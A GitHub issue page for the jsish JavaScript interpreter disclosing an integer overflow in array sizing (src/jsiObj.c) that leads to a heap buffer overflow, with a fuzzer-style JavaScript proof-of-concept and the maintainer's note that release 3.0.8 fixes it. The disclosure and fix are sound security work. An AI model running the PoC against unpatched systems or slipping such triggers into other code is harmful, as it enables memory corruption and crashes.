Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

integer overflow and buffer overflow #5

Closed
bird8693 opened this issue Apr 13, 2020 · 1 comment
Closed

integer overflow and buffer overflow #5

bird8693 opened this issue Apr 13, 2020 · 1 comment

Comments

@bird8693
Copy link

Enviroment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1

poc:

var o = [
    1,
    2
];
o.length = -9007199254740991;
o, 90040991;
var ExBs = new RegExp('>l1Pq4Q~R$!');
ExBs = o.reverse();
var zaCp = o.unshift(o.length, o, ExBs.lastIndex, o);
o.length = o.length != o;
o = zaCp.toExponential(o.length);
var FfYD = new RegExp('@OsH');
JSON.stringify('/Z-s#YisGL');
o = o.constructor();
FfYD.lastIndex = -1 <= -2147483647;
o.length = 1e+81 == FfYD.lastIndex;
var yfSi = new Map([
    [
        1,
        1200,
        o.length,
        ExBs.lastIndex
    ],
    [
        o,
        ExBs,
        o,
        0,
        -Infinity,
        -Infinity
    ]
]);
var Hjwz = new Map([
    [],
    [
        o,
        o,
        -1
    ]
]);
var QkwQ = new RegExp('GBY');
var dPft = new Map([
    [
        -2147483648,
        FfYD.lastIndex,
        FfYD,
        3037000498,
        0.1,
        ExBs.length,
        FfYD,
        2147483649
    ],
    [
        ExBs,
        FfYD.lastIndex,
        -9007199254740994
    ]
]);
var fjNQ = o.indexOf(0.2, function () {
});
var a = Object.keys(o);
var TdaH = new RegExp('#0CHy=U2|.xg^{;xO');
var APSB = -9007199254740990 != a.length;
var BYaK = new Float32Array([
    yfSi,
    4,
    -4294967295,
    FfYD,
    zaCp
]);
var wCMe = new WeakSet([]);

vulnerability description:

image

In src/jsiObj.c:428, len is the length of the Array, and the PoC is initially set to a maximum value by o.length. After the calculation of the code, nsiz is calculated as a negative number, which can bypass the two checks of line 421 and line 425.
image

obj-> arr will get a smaller size of heap space, and then memset assigns a value to the space pointed to by obj-> arr + obj-> arrMaxSize, but this time has exceeded the actual heap range of obj-> arr, causing heap overflow .
pcmacdon pushed a commit that referenced this issue Apr 13, 2020
Release "3.0.8": Address Array alloc sizing issues from issue "intege…
858da53 
…r overflow and buffer overflow #5".

FossilOrigin-Name: 8c46a1d465b358110dcfb271721d35fe843a1b52f2fa24ccc10094eb8aaf6fe4
@pcmacdon
Copy link
Owner

As of the previous commit the above reported bug is no longer reproducible.
However, have reworked code to use uint and avoid the problem, and also to use interp->maxArrayList instead of MAX_ARRAY_LIST.

This was referenced Apr 14, 2020
Closed
Closed
Closed
Closed
This was referenced May 11, 2020
Closed
Closed
Closed
This was referenced Oct 20, 2020
Open
Closed
Closed
Closed
Closed
Closed
Closed
This was referenced Oct 31, 2020
Closed
Closed
Closed
@pcmacdon pcmacdon mentioned this issue Jan 20, 2024
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@bird8693 @pcmacdon